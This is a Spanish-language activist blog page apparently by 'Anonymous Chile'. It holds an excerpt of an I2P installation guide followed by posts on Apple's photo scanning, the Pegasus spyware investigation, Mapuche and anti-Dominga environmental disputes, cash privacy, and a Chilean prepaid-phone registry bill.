Para instalar I2P en dispositivos móviles funcionando con Android, se requiere que el mencionado sistema operativo tenga instalada la versión 4.0 como mínimo, o posterior. Si ha instalado I2P anteriormente en su dispositivo móvil Android, debe preocuparse de mantenerla actualizado al día hasta la última versión liberada por el proyecto o de lo contrario podría experimentar ciertas dificultades de conexión, manejo, estabilidad y fuga de datos debido a fallas de seguridad que, si bien han sido descubiertas y parchadas, aún se encuentran en la versión de I2P instalada en su dispositivo.

Los requisitos para instalar I2P en cualquier dispositivo Android son únicamente tener 512 Mb de memoria RAM como mínimo, aunque lo más recomendado para el correcto funcionamiento de I2P en un dispositivo móvil con Android es que cuente con 1 Gb de memoria RAM. Cumpliendo lo mencionado, puede proceder con la instalación de I2P en su dispositivo móvil Android mediante la descarga del binario precompilado APK directamente desde la página web y servidores oficiales del proyecto.

De otro modo, también podrá encontrar el susodicho en F-Droid, como en Google Play. Una vez instalado, puede conectarse cómodamente sin problemas siguiendo las configuraciones por defecto y administrar o configurar su enrutador I2P directamente desde la misma aplicación.

GNU/Linux

  • Debian GNU/Linux y derivadas
  • Debian GNU/Linux es probablemente la distribución y sistema operativo que mejor funciona con I2P. Desde que los paquetes oficiales del proyecto y sus extensiones se encuentran en varios de sus repositorios, o los de sus distribuciones derivadas, hasta una configuración de iptables abierta y flexible para modificar, permitir y restringir numerosos puertos o servicios. Es común que I2P se vea limitado por incompatibilidad o inestabilidad con el sistema operativo, ISP del usuario o ubicación geográfica en la que se encuentra, pero con Debian GNU/Linux varios de estos problemas están eliminados por defecto simplemente debido a la estructura y funcionamiento de la distribución, como también la sencillez y rapidez de manejo de la misma llegando a ser tan fácil de conectar, configurar, administrar y operar como en Microsoft Windows. Dicho así, para iniciar con la instalación de I2P en Debian GNU/Linux o derivadas, primero debe comenzar actualizando todo el sistema de su distribución Debian GNU/Linux.
    Seguir leyendo «Conectando con la red anónima de I2P» →

67 comentarios

Invasión de privacidad en iOS: Apple vulnera la intimidad camuflándolo como lucha antipedofilia

Publicada el 10/08/2021 - 11/10/2021 por Anonymous Chile

El gigante tecnológico insiste en que va utilizar la tecnología solo para detectar posible contenido relacionado con el abuso sexual de menores. Sin embargo, los expertos y activistas tienen dudas.

Edward Snowden, el excontratista de la CIA y la Agencia de Seguridad Nacional de EE.UU. (NSA) que en 2013 reveló el programa de espionaje electrónico masivo en el país norteamericano, ha respaldado una petición contra el plan de Apple de escanear las fotos de todos los usuarios de iPhone, calificándolo de asalto a la privacidad.

Al anunciar el nuevo sistema de escaneo, el gigante tecnológico insistió en que va utilizar la tecnología solo para detectar, mediante algoritmos ‘hash’, posible contenido relacionado con el abuso sexual de menores (como por ejemplo pornografía infantil) que puedan tener como material fotográfico los usuarios de teléfonos inteligentes iPhone y de la línea de tabletas iPad.

Sin embargo, la noticia ya ha recibido muchas críticas por parte de diferentes activistas. La carta, publicada en la plataforma GitHub, está firmada por expertos en seguridad y privacidad, criptógrafos, investigadores, académicos, expertos legales y consumidores comunes, unidos en la condena de la «tecnología de escaneo de contenido que invade la privacidad» de Apple.

Si bien reconocen que los esfuerzos para combatir la explotación y el abuso infantil son «casi sin duda bien intencionados», los firmantes dicen que la propuesta de la compañía de monitorear y escanear constantemente las fotos de todos, y alertar a las autoridades si su algoritmo impulsado por IA los etiqueta como criminales, «introduce una vía que amenaza con socavar las protecciones de privacidad fundamentales para todos los usuarios de productos Apple».

Advierten que la tecnología tiene el potencial de eludir cualquier cifrado de extremo a extremo que normalmente salvaguardaría la privacidad del usuario, algo que el gigante tecnológico ha estado promocionando durante mucho tiempo como una característica importante de su sistema de ‘software’.

Además de respaldar la petición contra el plan de Apple, Snowden expresó en una serie de tuits su preocupación de que la compañía esté implementando una forma de «vigilancia masiva en todo el mundo» y sentando un precedente que podría permitirle a la firma buscar cualquier otro contenido arbitrario en el futuro.

No matter how well-intentioned, @Apple
is rolling out mass surveillance to the entire world with this. Make no mistake: if they can scan for kiddie porn today, they can scan for anything tomorrow.

They turned a trillion dollars of devices into iNarcs—*without asking.*
https://nitter.net/Snowden/status/1423466855986044928
Edward Snowden, 6 de Agosto, 2021

La petición contra el nuevo proyecto de Apple contiene citas de la Electronic Frontier Foundation (EFF), el Center for Democracy and Technology (CDT) y la Open Privacy Research Society, así como de varios destacados defensores e investigadores. Todos instaron al fabricante de iPhone a detener el despliegue de la tecnología propuesta «inmediatamente» y reafirmar su compromiso con la privacidad del usuario y el cifrado.

Espionaje automatizado con Pegasus, un malware de la empresa NSO Group infiltrado en todo el mundo

Publicada el 10/08/2021 por Anonymous Chile

Una investigación conjunta de 17 medios logró identificar a más de 1.000 personas en más de 50 países de una lista de 50.000 números de teléfono, identificados como pertenecientes a personas de interés para los clientes de NSO Group.

El ‘software’ espía Pegasus, cuya licencia la empresa de vigilancia israelí NSO Group vende a los gobiernos para que rastreen a terroristas y grandes criminales, fue utilizado para ‘hackear’ los teléfonos inteligentes de periodistas, activistas, ejecutivos de negocios y políticos en todo el mundo. Esto se desprende de una investigación conjunta realizada por 17 medios de comunicación, entre ellos The Washington Post, The Guardian y Le Monde.

La organización periodística sin fines de lucro Forbidden Stories, con sede en Francia, y el grupo de derechos humanos Amnistía Internacional obtuvieron acceso a una relación de más de 50.000 números de teléfono, identificados como pertenecientes a personas de interés para los clientes de NSO Group, y compartieron la lista con los medios de comunicación mencionados, que a su vez realizaron investigaciones.

No está claro quién agregó los números en la lista, que data de 2016, ni se conoce cuántos de ellos fueron hackeados o vigilados. No obstante, un análisis forense de 37 ‘smartphones’ muestra que muchos indican una estrecha correlación entre las marcas de tiempo asociadas con un número en la lista y el inicio de la vigilancia, en algunos casos tan breve como unos pocos segundos. De estos 37 teléfonos, 23 fueron hackeados con éxito, mientras que 14 mostraron signos de intento de hackeo.

Los números de la lista no están atribuidos, pero se logró identificar a más de 1.000 personas en más de 50 países, entre ellos varios miembros de la familia real de Arabia Saudita, al menos 65 ejecutivos de negocios, 85 activistas de derechos humanos, 189 periodistas y dos mujeres cercanas al periodista saudita Jamal Khashoggi, asesinado en 2018. La lista también contiene los números de varios jefes de Estado y primeros ministros, y los de más de 600 políticos y funcionarios gubernamentales, incluidos ministros de gabinete, diplomáticos y oficiales militares y de seguridad.

Entre los periodistas cuyos números están en la lista, los hay que trabajan para los medios estadounidenses CNN, Associated Press, Voice of America, The New York Times, The Wall Street Journal y Bloomberg News, así como para el francés Le Monde, el Financial Times británico y Al Jazeera, de Catar, entre otros.

Según la investigación, varios de los números de la lista se concentraron en 10 países: Azerbaiyán, Baréin, Hungría, India, Kazajistán, México, Marruecos, Ruanda, Arabia Saudita y los Emiratos Árabes Unidos. Se descubrió también que esas 10 naciones han sido clientes de NSO Group.

¿Cómo funciona Pegasus?

Pegasus es un potente ‘software’ espía que se cree que es capaz de robar toda la información de un ‘smartphone’, incluidos nombres y números de teléfono de cada contacto, mensajes de texto y de redes sociales, correos electrónicos, etc. Además, el programa puede encender la cámara y el micrófono del teléfono o recopilar datos de ubicación y registros de llamadas.

Para que Pegasus pueda infectar un teléfono, se envía lo que se conoce como un enlace trampa que persuade a la víctima para que lo toque y de esta manera active el ‘software’ espía. No obstante, en algunos casos Pegasus puede ser instalado sin la intervención del usuario, una estrategia que se conoce como de ‘cero clics’.

Respuesta de NSO Group

En respuesta a la investigación, la compañía de vigilancia israelí declaró que «niega categóricamente las afirmaciones falsas» aparecidas en las publicaciones, tachándolas de «teorías no corroboradas que plantean serias dudas sobre la confiabilidad de las fuentes, así como sobre la base de la historia».

NSO Group «no opera los sistemas que vende a clientes gubernamentales examinados ni tiene acceso a los datos de los objetivos de sus clientes. NSO Group no opera su tecnología, ni recopila, ni posee, ni tiene acceso a ningún tipo de datos de sus clientes», aseguró la empresa, que se negó a descubrir la identidad de los compradores de su ‘software’ «debido a consideraciones contractuales y de seguridad nacional».

La compañía indicó también que tiene «la misión de salvar vidas», ya que sus tecnologías, incluido Pegasus, ayudaron a prevenir ataques terroristas, violencia con armas y otros delitos graves. NSO Group agregó que continuará investigando todas las «denuncias creíbles» de uso indebido de sus programas, y que tomará «medidas adecuadas» al respecto, como desactivar a los clientes del sistema.

Al respecto, el periodista Eliécer Jiménez Julio señaló que «este no es un tema nuevo, el del espionaje a los políticos que no son del agrado de Israel o de los EE.UU. o de los gobiernos occidentales». El experto agregó que se trata de «una clara violación en flagrancia de los derechos humanos, sobre todo para los políticos o para cualquier persona en su intimidad».

Denuncia del pueblo Mapuche movilizados contra el monstruo extractivista de Statkraft

Publicada el 10/08/2021 por Anonymous Chile

Un hecho grave denuncian las Comunidades Defensoras del Espacio Ceremonial del Ngen Mapu Kintuante y el Río Pilmaiquen, en contra de la Empresa Estatal Noruega Statkraft dueña de los proyectos hidroeléctricos en el río Pilmaiquen y que poseía el dominio del espacio sagrado y que hoy utiliza para dividir y enfrentar a las comunidades indígenas del sector.

La Machi Millaray Huichalaf, Comunidades Mapuche del Territorio del Pilmaiquén y diversas comunidades de la Futawillimapu, presentaron este lunes 6 de junio del 2021, un recurso de protección ante la Corte de Apelaciones de Valdivia, luego de que la CONADI, la Compañía Estatal Noruega STATKRAFT, a través de su Empresa Eléctrica Pilmaiquen S.A., hayan decidido entregar, de manera arbitraria, el Espacio Ceremonial del Ngen Mapu Kintuante, ubicado en el sector rural de Maihue-Carimallín a una asociación de personas naturales, recientemente formada por la CONADI, que no representan a las Comunidades Mapuche y autoridades ancestrales del territorio, en el cual las comunidades reclamantes mantienen un proceso de reivindicación de Tierra por más de 10 años y en el que la CONADI aun no ha entregado respuesta.

La Machi Millaray Huichalaf, una de las reclamantes del recurso judicial hace un llamado a desconocer cualquier tipo de traspaso de tierra donde se encuentra el espacio sagrado del Ngen Mapu Kintuante y recalca que las Comunidades defensoras del territorio nunca han negociado con Statkraft y que el espacio ceremonial se va defender, ya que se ha hecho uso de hecho y de derecho del lugar.

Por su parte, el abogado Felipe Guerra, representante de la Comunidades Mapuche del Pilmaiquén señala que el objetivo de este recurso es que los demandados “se abstengan de transferir la propiedad del Kintuante de manera unilateral a organizaciones y personas naturales que ellos han definido, mientras se tramita la solicitud de reivindicación que las comunidades llevan tramitando más de 10 años ante la CONADI” y “que este organismo ejerza su rol institucional que la ley Indígena le ha otorgado y entregue soluciones a la demanda territorial de las comunidades del Pilmaiquén”

Orieta Llauca Huala, abogada Mapuche Williche, representante de las Comunidades Mapuche de la Futawillimapu querellante señala “Se va presentar una demanda de reivindicación territorial ante los tribunales de justicia civiles, a fin de que los tribunales de justicia en virtud de los que establece el control territorial de las normas y el principio de la inexcusablilidad, se pronuncie sobre nuestras demanda y reclamación de dominio que tenemos en nuestro territorio que nos pertenece como nación Mapunche”

Esteban Vera, Presidente de la Comunidad Mapuche Leufu Pilmaiquen de Río Bueno, se refirió sobre recurso de protección ante la corte de Apelaciones de Valdivia.

Finalmente, las Comunidades Mapuche del territorio del Pilmaiquén, hacen un llamado a otras organizaciones Mapuche y no Mapuche para hacerse parte y presente en el lugar, para fortalecer su espiritualidad y participar de las diferentes iniciativas, acciones socioculturales y ambientales que buscan denunciar y visibilizar las malas prácticas que utiliza la Compañía Estatal Noruega Statkraft, para romper el tejido social y cumplir su ambicioso objetivo de represar las aguas del Río Pilmaiquén.

Minera Dominga: La mentira para acabar con el Archipiélago Humboldt y adueñarse de La Higuera

Publicada el 10/08/2021 por Anonymous Chile

La Higuera, comuna ubicada en la región de Coquimbo, pese a ser de los ecosistemas más ricos y biodiversos del planeta se encuentra amenazada por el proyecto minero portuario Dominga, de la empresa Andes Iron SpA, perteneciente a la familia de Carlos Alberto Délano, amigo de Sebastián Piñera y controlador del Grupo Penta.

El proyecto Dominga planea dinamitar dos agujeros de rajo abierto para extraer hierro y pretenden transportarlo por aguas de alto valor para la flora y fauna, a menos de 30 kilómetros de cuatro reservas medioambientales de importancia mundial y con especies marinas bajo protección.

Pese a ser rechazado en varias oportunidades, el proyecto sigue en pie y busca dar su último, pero decisivo, golpe para lograr la aprobación.

Dominga: El proyecto Minero-Portuario

El proyecto minero portuario “Dominga”, de la empresa Andes Iron, pretende emplazarse en la costa de la comuna de La Higuera, al norte de la Región de Coquimbo. Tiene como propósito la extracción y procesamiento de hierro con cobre como subproducto, abarcando desde la extracción del mineral hasta el embarque de concentrado para su comercialización, para lo cual incluye todos los procesos e instalaciones asociadas: dos rajos abiertos, una planta desalinizadora, un puerto de embarque y un depósito de relaves espesados.

El proyecto ingresó al Sistema de Evaluación de Impacto Ambiental (SEIA) en septiembre de 2013. Fue estudiado por 3 años y medio y contó con tres procesos de participación ciudadana (PAC), dos de ellos por modificación sustantiva en las Adendas N°1 y N°3, ejecutando en total 24 actividades de participación ciudadana con la asistencia de, al menos, 730 personas. Como resultado, en el proceso se recibieron 1231 observaciones ciudadanas admisibles.

En marzo de 2017, el proyecto fue calificado desfavorablemente (Resolución Exenta N° 25) por la Comisión Regional de Evaluación Ambiental de Coquimbo, debido principalmente a que las propuestas de la empresa referidas a las medidas de mitigación, compensación o reparación fueron consideraras insuficientes por las autoridades.

La empresa recurre a la Corte Suprema el año 2018: presentó un recurso de reclamación ante el Primer Tribunal Ambiental de Antofagasta, instancia que revocó el rechazo y sentenció que el proyecto debía volver a votarse en la Comisión de Evaluación Ambiental de Coquimbo. En este contexto, se organizan 94 organizaciones ambientales y sociales bajo el nombre de la Alianza Humboldt quienes presentan seis recursos de casación ante la Corte Suprema para que dejara sin efecto la resolución del Tribunal Ambiental y dictara sentencia de reemplazo, mediante la que se mantenga su rechazo.

El jueves 28 de febrero de 2019 el máximo tribunal terminó de escuchar los alegatos patrocinados por la Fundación Geute Conservación Sur, ONG Oceana, Asociación Gremial de Mariscadores y Pescadores de Los Choros, Movimiento en Defensa del Medio Ambiente de La Higuera, Comité de Agua Potable Rural Los Choros y Asociación de Pequeños Propietarios Agrícolas de Los Choros, que expusieron las razones por las que Dominga debe mantenerse rechazado.

Finalmente, el 27 de septiembre de 2019, la Corte Suprema dio su veredicto: El proyecto seguía rechazado y debía ahora volver a votarse en el Tribunal Ambiental de Antofagasta, sin embargo, ahora deben discutirse los aspectos técnicos del proyecto.

¿Por qué No a Dominga?

Dominga, es un proyecto que traería graves impactos ambientales en un área de importancia mundial para la biodiversidad.

En las cercanías del proyecto minero-portuario, existen tres áreas bajo protección oficial y dos sitios prioritarios. Se trata de Punta Teatinos, hasta Quebrada Honda e incluyendo Isla Pájaros, Área Marina Punta de Choros, Reserva Nacional Pingüino de Humboldt, Reserva Marina Isla Choros-Damas e Isla Gaviota. Esta zona ha sido llamada como el Archipiélago de Humboldt-

Por una parte, la empresa Andes Iron, señala que estas áreas no se encontrarían en la zona de influencia del mismo, por lo que no se verían afectadas. Sin embargo, la comunidad científica señala que existe documentación específica que confirma que,
aun cuando la minera no pase directamente por las reservas, el daño a las especies protegidas es altamente significativo, debido a que se interviene el espacio marino donde estos animales se alimentan.

El archipiélago Humboldt, ubicado al norte de la ciudad de La Serena, fue incluido en la lista de los sitios marinos de mayor significancia biológica por la fundación internacional sin fines de lucro “Mission Blue”.

El espacio marino que comprenden estas ocho islas es uno de los ecosistemas más ricos del país, donde es posible encontrar el 80% de la nidificación del pingüino de Humboldt, varias especies de aves marinas, colonias de lobos de mar, chungungos, delfines, orcas y las grandes ballenas. Además, el archipiélago Humboldt posee caletas ancestrales, que aun son ocupadas por las comunidades locales, las que han desarrollado un creciente polo de ecoturismo.

“El archipiélago Humboldt es un laboratorio natural donde tenemos una oportunidad única para estudiar y proteger los mejores ejemplares del ecosistema de bosques submarinos y las zonas de alimentación de ballenas como la azul, fin o jorobada en el sistema de surgencia costera de la corriente de Humboldt”, explica Susannah Buchan, doctora en oceanografía e investigadora asociada de la Universidad de Concepción y del centro de estudios CEAZA.

Entre los impactos que el proyecto Dominga generaría se encuentra el daño a la flora y fauna que anida y se reproduce en La Higuera; efectos sobre ballenas, delfines y otras especies que se alimentan en los bancos de krill que existen donde pasarían los buques cargueros; colisiones de las embarcaciones con los cetáceos, y los potenciales derrames de hidrocarburos en el mar que podrían causar un irreparable daño a la biodiversidad marina. Por otro lado, la planta desalinizadora que pretende construir la empresa para las operaciones de la minera podría producir cambios en la salinidad del agua que afectaría a diferentes especies, producto de que la empresa contempla devolver la salmuera resultante de la desalinización al mar

Otro de los temas de preocupación es la ubicación de uno de los rajos por encima del acuífero Choro Alto, que abastece de agua a la Comuna de La Higuera y a otras localidades cercanas y, gracias al cual, a pesar de la escasez de agua y la falta de precipitaciones que enfrenta la IV Región, podría proveer de agua a las comunidades por un período de hasta 7 años. Por otro lado, las organizaciones de la zona señalan que la llegada de Dominga afectaría gravemente a la pesca, la
agricultura y el turismo.

De ser aprobado, Dominga estaría activa por 22 años en los que la empresa espera extraer anualmente 12 millones de toneladas de hierro concentrado y 150 mil toneladas de cobre concentrado.

La mafia detrás de Minera Dominga: La red de influencias de Carlos Délano

El Proyecto es una iniciativa de Andes Iron, sociedad que pertenece en un 100% a la familia Délano, y su mandamás Carlos Alberto Délano. Él es amigo de Piñera, empresario, multimillonario y estafador. El 2018 fue juzgado y condenado por delitos tributarios reiterados, el “Caso Penta”: financió irregularmente a políticos para tenerlos como títeres. Tuvo que cumplir cien horas de clases de ética en la Universidad Adolfo Ibáñez.

Délano estuvo recluido por más de un mes por prisión preventiva en el Anexo Penitenciario Capitán Yáber. Actualmente sigue en libertad vigilada intensiva por ser autores de delitos consumados y reiterados. Además están inhabilitados de sus derechos políticos y de ejercer cargos públicos mientras duren las condenas.

Sebastián Piñera, actual Presidente de Chile, es un antiguo amigo de Carlos Alberto Délano. Tanto así, que algunos terrenos donde se emplazaría Dominga son propiedad de Bancard, la sociedad comercial de la familia del Jefe de Estado. Piñera figura como “inversionista temprano” del proyecto Minera Dominga.

Creció en una familia burguesa y acomodada, estudió en el Colegio Saint Dominic y estudió Ing Comercial en la UC. Sus redes con el mundo político y empresarial que gobierna Chile son de profundas amistades y lazos familiares.

Se inició como empresario a mediados de los años 1980, cuando junto a Carlos Eugenio Lavín, adquirieron, de manos de la Dictadura y a un precio muy económico, el 5% del Consorcio Nacional de Seguros (CNS) y posteriormente, en 1986, se hicieron dueños de la Compañía de Seguros Generales Consorcio Nacional de Seguros, formando así la empresa Penta S.A

Como entendían el sistema chileno sumaron a su holding la AFP Cuprum la Isapre Vida Tres y el Banco de Chile. Actualmente esos capitales se concentran en las empresas Penta Vida, Penta Security, Banco Penta y Banmédica, entre otras.​

Fue director de Radio Portales, LAN Chile y Azul Azul S.A. También ha integrado los directorios de la Bolsa de Comercio de Santiago, ICARE, la Feria Ganadera de Osorno, la Teletón, la fundación Imagen de Chile y la Universidad del Desarrollo.

Es importante manejar esta información para entender que el Proyecto Dominga tiene un apoyo incondicional por parte de la red de influencias de Délano: desde el Presidente, toda la UDI, Jose Antonio Kast, los grandes empresarios y sus familias, apernadas en las cúpulas de poder mediático, militar y religioso.

“Creemos que por las características del actual Gobierno y por la relación que tiene el Presidente Piñera con el desarrollador del proyecto, sí podría convenirle a la compañía este nuevo escenario”, dice Marcela Rey, abogada de Geute Conservación Sur. Para ella y otros abogados al tanto del proceso, existen claras relaciones que pueden significar un redespegue de la iniciativa.

“La empresa ha hecho una campaña comunicacional, y un poco del terror, enorme. Por ejemplo, los camiones aljibe que reparten agua tienen propaganda de Dominga, llevan años haciendo ferias laborales y tenemos conocimiento de que han presionado a las municipalidades. Se ha transformado en una cosa muy política”, pero la verdad es que siempre lo fue.

Por eso es que su estrategia es contundente: se trata de un operativo orquestade de acciones políticas, sociales, comunicacionales y económicas sobre La Higuera. Los habitantes están siendo asediado por Andes Iron. Délano, pese a su aparente éxito como hombre de negocios, ha vuelto después de ser expuesto públicamente en el Caso Penta y quiere su porción de Chile: su pequeño reino en la comuna de La Higuera. Y lo quiere a toda costa, literalmente.

Una nueva estrategia: la historia después de la Corte Suprema

Cuando la Corte Suprema entregó al Primer Tribunal Ambiental de Antofagasta el caso de la Minera Dominga el director del proyecto para ese entonces, Iván Garrido, señaló que no se rendirían: “tenemos la certeza de que podremos reafirmar ante los tribunales ambientales que el proyecto concilia, en base a los mejores estándares, el desarrollo minero -con implicancias locales y nacionales- con la protección del medio ambiente“, concluyó.

Parecía seguro, sin embargo, él y otros importantes ejecutivos del proyecto fueron despedidos por la familia Délano. Su salida significó un verdadero quiebre, un nuevo inicio: los dueños querían otra estrategia para cuando se iniciara el proceso en el Primer Tribunal Ambiental de Antofagasta. Ahora el proyecto es dirigido por el yerno de Carlos Délano, Pedro Ducci, junto a Francisco Villalón y Luis Bugueño, gerente del proyecto Dominga

“A río revuelto ganancia de pescadores” así versa el dicho popular, pero su sabiduría es absoluta: cuando la situación es caótica y las soluciones son desesperadas, las antiguas ideas de extractivismo encuentran oportunidad para aflorar como ideas viables. En la última sesión del alegato en el PTA de Antofagasta, Patricio Leyton, abogado representante del proyecto minero Dominga, señaló que la compañía se abría a la opción de evitar que en la zona existiesen dos terminales portuarios, renunciando a la construcción del suyo, si CAP desarrollaba su proyecto Cruz Grande, que ya tiene aprobación ambiental.

Además, en paralelo a esto, y en plena crisis sanitaria los operadores políticos de Délano han logrado intervenir en otras instancias de discusión política: el Consejo Regional de Coquimbo La maquinaria está andando.

Si bien el apoyo que han expresado los CORE no es vinculante, es una señal de alerta que revela hasta que nivel son capaces de llegar para buscar apoyo. Todo esto marcan precedentes que sirven como termómetros para quienes deben tomar la decisión.

Fueron trece votos a favor y tres en contra. A favor se inclinaron los consejeros de Élqui: Adriana Peñafiel (RN); Paola Cortés (UDI); Marco Antonio Sulantay (UDI); Marcelo Castagneto (RN) y Lombardo Toledo (DC). De Limarí: Lidia Zapata (DC); Alberto Gallardo (UDI); Teodosio Guerrero (RD) y Hanna Jarufe (INDEPE). De Choapa: Angela Rojas (UDI); Jaime Herrera (RN); Cristián Rondanelli (UDI) y Cristian Carriel (DC) . En tanto, los consejeros de Élqui Carlos Galleguillos (PC), Javier Vega (PS) y el Core de Limarí Juan Carlos Codoceo (INDEPE) votaron en contra de la iniciativa.

Este voto político que el Consejo Regional da a favor del Proyecto Minero Dominga se coordina con la encuesta ciudadana realizada por la consultora Cadem junto a la UCN, que fue publicada en el diario EL Día y que muestra que un 76% de los vecinos aprueban Dominga.

La contracampaña: #NoaDominga

Mediante una declaración pública, el Partido Socialista en Coquimbo señaló que la postura del Consejo, además “de escapar a la esfera de competencias de dicho cuerpo colegiado, resulta ser una seria afectación al principio constitucional de independencia de los Tribunales de Justicia”. La postura del Consejo «es una intervención inaceptable en una democracia sana», agregaron los socialistas, que anunciaron que solicitarán un pronunciamiento de la Contraloría General de la República. Asimismo, integrantes del colectivo ambientalista Alianza Humboldt acudieron a Contraloría para consultar por las atribuciones del cuerpo colegiado para hacer este tipo de declaraciones.

En el documento entregado al ente regulador, señalan que el proyecto minero portuario Dominga, de Andes Iron, no cuenta con Resolución de Calificación Ambiental favorable.

Pese al trabajo del clan Délano y sus operadores, diferentes actores socio ambientales, científicos y territoriales que han defendido la zona desde hace años y frente a diversos proyectos, ya han demostrado su opinión en la localidad, de forma presencial y por redes sociales. La campaña es dirigida con el Hashtags #NoaDominga.

Es importante estar alerta: el Primer Tribunal Ambiental de Antofagasta está pensando el veredicto y la campaña comunicacional de la familia Délano es feroz. El llamado de los ambientalistas y defensores de la Reserva, la comuna de La Higuera y sus habitantes, señalan que es momento de involucrarse más y no caer en un pensamiento cortoplacista, no retroceder y seguir pensando un mundo sin catástrofes ambientales, sin extractivismo depredador de ecosistemas. En Definitiva, un mundo sin proyectos como Dominga.

Sin privacidad no hay libertad

Publicada el 03/08/2021 por Anonymous Chile

La dimensión más esencial de la libertad de una persona es su privacidad. Sin ella, nuestra identidad pierde su carácter distintivo. Cuando se carece de intimidad somos menos libres, porque nos condiciona la opinión de aquellos ante quienes estamos expuestos. Sentirnos observados nos influye, y favorece que nuestro comportamiento sea aquél que nos haga pasar más inadvertidos. Sin embargo, este deseo de evitar las miradas ajenas hay que hacerlo compatible con el de considerarnos protegidos, aspiración a la que es difícil sustraerse ante el aluvión de noticias relacionadas con el terrorismo que cada día nos inunda.

Esa actitud que antepone la seguridad a todo lo demás suele ir más allá de la razonable y, espoleada por el miedo, mueve a los propios ciudadanos a reclamar medidas preventivas cada vez más coercitivas. La crispación que provoca un atentado hace que no nos importe tanto que el Estado, bajo la justificación de defendernos, se arrogue la prerrogativa de que nada escape a su vigilancia de Gran Hermano. Hoy, el derecho a la privacidad está tan cuestionado que no se protesta cuando se vulnera nuestra intimidad. El Gobierno se ha aprovechado del temor colectivo para legitimar su capacidad de control sobre las actividades de las personas, aunque éstas no guarden relación con la seguridad.

Es cierto que las plataformas comerciales online saben de nuestros hábitos de compra y que, así, nos conocen por dentro y por fuera, pero siempre a partir de los datos que voluntariamente les hemos dado. Por el contrario, las instituciones públicas pueden disponer, sin nuestro permiso, de infinidad de registros personales. Esta información, si se suma la de todos los ciudadanos y se integra en el big data, otorga al Ejecutivo una inmensa potencialidad de influir o manipular.

Por ello, hay ya muchas personas que han optado por usar blackphones para salvaguardar su privacidad. Sin embargo, esta cautela sirve de poco ante la presión que nos obliga cada vez más al pago electrónico. La paulatina desaparición del dinero en efectivo reduce el anonimato del consumidor. Cada compra con una tarjeta de crédito supone una cesión de información personal, tanto al fisgón legal como al hacker.

En España, esta sobreexposición a la mirada ajena no parece preocuparnos en exceso, a tenor de lo desprendidos que somos con nuestros datos, especialmente con los provenientes de nuestras pautas de consumo. Así, los pagos en metálico ya sólo suponen un 50% del total, tal y como ponía de manifiesto un informe realizado por el Instituto de Coordenadas de Gobernanza y Economía Aplicada. Lejos, por tanto, de la media mundial, que asciende al 85%, o incluso de la de nuestros pares de Europa Occidental, donde los pagos en efectivo suponen todavía el 66%.

Esta prevención al dinero contante y sonante en cantidades importantes, aparte de por los cambios en los hábitos de compra, ha venido motivada, en no pocas ocasiones, por una reacción de la sociedad ante los múltiples casos de corrupción que ha sufrido nuestro país, que, en el imaginario popular, encuentran su traducción más tangible en un maletín repleto de billetes morados. En ese sentido, las operaciones que quedan registradas en un disco duro o flotando en la nube se asocian con una mayor voluntad de transparencia. Esto, unido a lo cómodas que resultan, ha facilitado que cunda su aceptación entre la opinión pública, que se siente tranquilizada ante la convicción de que, si todo movimiento se hace con luz y taquígrafos, los facinerosos y pillos de cualquier calaña quedarán cada vez más arrinconados, sin una posible escapatoria. Sin la más remota posibilidad de continuar con sus enjuagues y de llevárselo crudo delante de nuestras narices. Una esperanza reconfortante para unos ciudadanos indignados, apetecible de creer cuando nos han arrastrado hasta los límites del desengaño colectivo, pero infundada.

Si se trata de prevenir el delito fiscal, hay que tener en cuenta que los mayores estafadores ni cobran ni blanquean con billetes de 500 euros, sino a través de transacciones electrónicas en paraísos fiscales y de las criptomonedas. Así, no dejan pruebas que les incriminen. Comprendo que la lucha contra los grandes defraudadores obligue a que los pagos de cantidades importantes requieran una identificación completa de la operación, pero que no se pueda pagar en efectivo ni 1.000 euros sin dar nuestros datos es una intromisión en nuestra privacidad. Al que tienen que vigilar es a quien vende para que cobre el IVA, pero no a quien lo abona, quien conserva el derecho de preservar su identidad.

Aunque sólo fuera para prevenir las ocasiones en que falla el sistema por un corte eléctrico o de señal, se debiera restablecer el umbral de dinero en efectivo que debe ser fiscalizado (2.500 euros). Y es que, permitir un mayor margen de discrecionalidad con esas pequeñas cantidades no implica un aumento significativo del fraude. Antes bien, hay que aplicarse en prevenir el caos provocado por un posible gran ataque de alguna de las mafias de hackers. Estos nos dan sustos cada vez más impresionantes. Hace medio año, el ciberataque global Ransomware tumbó los sistemas de seguridad de varias grandes compañías que se consideraban inexpugnables. Imaginen el desorden social que se habría producido si el Ransomware se hubiera centrado en los sistemas de pago electrónico. Los allanamientos que perpetran en las entidades financieras y que ocasionan cuantiosas pérdidas han probado que este sector es muy vulnerable.

Un país que impone tantas limitaciones al uso del dinero en efectivo convierte a sus ciudadanos en súbditos controlados, lo que nos hace menos libres. El derecho a la propia privacidad es inalienable y debe ser compatible con el respeto a la intimidad. Si la privacidad no se protege, sin darnos cuenta, perderemos nuestra cualidad humana más digna: la libertad. Como dijo Benjamin Franklin: «Aquellos que renuncien a una libertad esencial para comprar un poco de seguridad momentánea no merecen ni una ni otra y acabarán perdiendo ambas».

La amenaza del fracasado padrón de telecomunicaciones: injusticias, poca transparencia y vigilancia gubernamental

Publicada el 02/08/2021 - 02/08/2021 por Anonymous Chile

La idea del proyecto es la creación de un padrón de usuarios para combatir la delincuencia, imitando un método que ha fracasado a nivel mundial.

Cómo en las películas de terror, el pasado mes de Mayo del presente año 2021 el presidente Sebastián Piñera revivió de forma inesperada y con urgencia inmediata un proyecto de ley que dormía en el Congreso desde su nacimiento, en agosto de 2018.

Se trata del Boletín n° 12.042-15 que modifica la ley N° 18.168, General de Telecomunicaciones, en materia de individualización y registro de datos de los usuarios de servicios de telefonía en la modalidad de prepago. La idea del proyecto es la creación de un padrón de usuarios para combatir la delincuencia, imitando un método que ha fracasado a nivel mundial y que en algunos casos inclusive ha empeorado la situación.

Una tramitación acelerada y desequilibrada

Tan pronto resucitó, el proyecto se puso en tabla para su discusión parlamentaria. Una semana después la Comisión de obras públicas de la Cámara de Diputados estaba sesionando para su votación, aunque finalmente se haya acordado postergarla con el objeto de escuchar previamente algunas exposiciones.

En sesión del 15 de Junio expusieron la Policía de Investigaciones, el Ministerio Público y la Subsecretaría de Telecomunicaciones, y se acordó gestionar la postergación de la Urgencia de discusión inmediata para escuchar también a la Subsecretaría de Prevención del Delito y al OS9 de Carabineros de Chile.

Hasta aquí, ningún representante de la academia o de la sociedad civil había sido invitado a participar de la discusión. Y como en pedir no hay engaño, los partidarios del proyecto aprovecharon la oportunidad para hacer particulares requerimientos.

